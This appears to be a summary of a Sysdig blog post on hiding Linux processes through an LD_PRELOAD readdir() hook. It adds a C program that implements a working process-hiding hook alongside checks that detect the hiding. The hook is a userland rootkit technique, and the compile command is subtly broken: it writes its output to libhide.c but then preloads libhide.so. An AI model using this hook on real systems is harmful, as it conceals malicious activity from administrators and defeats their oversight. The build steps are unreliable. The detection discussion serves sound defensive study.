Hiding Linux processes for fun + profit
Blog post from Sysdig
Gianluca Borello explores how a process can be hidden from Linux monitoring tools such as `ps` and `top`. Those tools build their process list by enumerating /proc, so he uses the dynamic linker's LD_PRELOAD mechanism to inject a custom shared library that overrides libc's `readdir()` and filters the entry for a malicious script out of every listing of /proc, which makes the script disappear from standard process monitoring. The post weighs other ways to achieve the same effect, such as patching the monitoring binaries themselves or hooking the kernel's system calls, and settles on the preloading technique for its simplicity and effectiveness. Although the script is then invisible to the traditional tools, Borello shows that Sysdig, which captures system calls at the kernel level rather than reading /proc, still records the process and its activity. The experiment highlights the versatility of the /proc file system and the difficulty of concealing system activity completely, and argues for monitoring through system calls as well as through file system data.
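The following C program is an added example written for this summary, not the post's or Sysdig's code. It interposes `readdir()` in the same spirit as the post, but hides a PID rather than a script name, and it includes the two checks a responder would run against such a hook: enumerating /proc through `readdir()` (what `ps` does) and asking the kernel about the PID directly (what a user-space hook cannot intercept). The `HIDE_PID` environment variable is an assumed name for this example; when it is unset the program hides itself, so the stand-alone binary demonstrates the discrepancy without any setup. Compiled with `gcc -shared -fPIC -o libhide.c hide.c` and injected with `LD_PRELOAD=./libhide.so`, the same hook applies to any dynamically linked tool.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)   /* glibc value, in case _GNU_SOURCE came too late */
#endif

/* PID to hide. HIDE_PID is an assumed environment variable for this example;
 * when it is unset the hook hides the calling process itself. */
static pid_t hidden_pid(void)
{
    static pid_t cached = 0;
    if (cached == 0) {
        const char *env = getenv("HIDE_PID");
        cached = (env && *env) ? (pid_t)atoi(env) : getpid();
    }
    return cached;
}

/* True when a /proc entry name is exactly the decimal PID to hide.
 * Non-numeric entries (self, sys, net, ...) are never hidden. */
int is_hidden_entry(const char *name, pid_t hide)
{
    char *end;
    long v = strtol(name, &end, 10);
    if (name[0] == '\0' || *end != '\0')
        return 0;
    return v == (long)hide;
}

/* Only filter listings of /proc itself: compare device and inode. */
static int dir_is_proc(DIR *dirp)
{
    struct stat d, p;
    if (fstat(dirfd(dirp), &d) != 0 || stat("/proc", &p) != 0)
        return 0;
    return d.st_dev == p.st_dev && d.st_ino == p.st_ino;
}

/* Interposed readdir(): behaves like libc's, except that the hidden PID's
 * entry is skipped. The real function is looked up with RTLD_NEXT. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (real_readdir == NULL) {
        *(void **)(&real_readdir) = dlsym(RTLD_NEXT, "readdir");
        if (real_readdir == NULL)
            return NULL;
    }
    int in_proc = dir_is_proc(dirp);
    struct dirent *e;
    while ((e = real_readdir(dirp)) != NULL) {
        if (in_proc && is_hidden_entry(e->d_name, hidden_pid()))
            continue;               /* drop the entry and keep reading */
        return e;
    }
    return NULL;
}

/* The "ps view": walk /proc through readdir() and look for the PID.
 * Returns 1 if listed, 0 if not, -1 if /proc cannot be opened. */
int pid_visible_via_readdir(pid_t pid)
{
    char want[32];
    snprintf(want, sizeof want, "%d", (int)pid);
    DIR *d = opendir("/proc");
    if (d == NULL)
        return -1;
    int found = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL)
        if (strcmp(e->d_name, want) == 0) { found = 1; break; }
    closedir(d);
    return found;
}

/* The "kernel view": stat() the PID's directory by name. No directory
 * listing is involved, so the readdir() hook never sees this request. */
int pid_exists_direct(pid_t pid)
{
    char path[64];
    struct stat st;
    snprintf(path, sizeof path, "/proc/%d", (int)pid);
    return stat(path, &st) == 0;
}

int main(void)
{
    pid_t me = getpid();
    printf("pid %d: listed by readdir() = %d, found by stat() = %d\n",
           (int)me, pid_visible_via_readdir(me), pid_exists_direct(me));
    return 0;
}
```

The two results disagree for the hidden PID, and that disagreement is exactly what a system-call-level monitor such as Sysdig, or a brute-force PID probe of the kind `unhide` performs, relies on. The hook also only fools programs that reach `readdir()` through the dynamic libc: a statically linked tool, or one that calls `getdents64()` itself, still sees the entry.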